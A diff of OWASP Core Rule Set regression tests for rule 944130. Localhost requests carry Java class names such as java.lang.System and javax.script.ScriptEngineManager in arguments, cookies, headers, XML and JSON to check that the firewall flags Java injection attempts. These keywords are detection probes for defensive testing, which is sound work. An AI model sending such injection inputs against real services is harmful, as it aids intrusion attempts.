Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-374 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-375 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-376 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-377 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log: + expect_ids: [944130] + - test_id: 377 desc: "Cookie test includes keyword java.lang.System" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-378 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-379 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" 
+ Cookie: java.lang.System=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-380 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-381 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-382 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-383 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-384 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id 
\"944130\"" - - test_title: 944130-385 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log: + expect_ids: [944130] + - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-386 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-387 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-388 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log: + expect_ids: [944130] + - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-389 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-390 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
javax.script.ScriptEngineManager=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-391 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-392 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-393 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id 
\"944130\"" - - test_title: 944130-394 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-395 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-396 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log: + expect_ids: [944130] + - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-397 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: 
- Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-398 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-399 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log: + expect_ids: [944130] 
+ - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-400 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-401 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
